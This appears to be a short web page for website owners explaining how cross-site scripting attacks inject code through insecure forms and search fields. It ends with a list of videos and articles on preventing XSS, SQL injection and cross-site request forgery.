XSS (Cross Site Scripting) Attacks. How can I prevent XSS attacks on my website?
Many websites today are reeling under persistent XSS (cross site scripting) attacks where vulnerable code is being attached to their webpages which block their sites on Google and other search engines and prevent users from browsing their websites. Users not using updated browsers download the malicious code on their PCs or are being redirected to the websites of the malicious code, where their sessions are being captured or sensitive data like usernames/passwords are being used by hackers to gain priveleged information which could cause damage to the users and the website owners alike.
Many website owners feel that this is a problem with the webhost or that their PCs are virus infected and the files which they are uploading on their webserver is virus infected and that is causing this problem. But this is simply not the case! XSS attacks are generated on a runtime basis due to insecure code on your website or web application which is being used by hackers to attach their own code into your website through insecure feedback forms, user registration/login forms and even search fields.
Here are some collection of links to online videos and resources which should enable you to gain a better understanding of XSS and how to block prevent XSS attacks on your website:
Video 1: A brief video primer on SQL Injection works.
Video 2: Persistent Cross Site Scripting
Video 3: Don Ankney of Microsoft talks about the continuing challenges around eradicating Cross Site Scripting from the Earth.
Foiling Cross-Site Attacks: An interesting read on XSS and cross-site request forgeries(CSRF).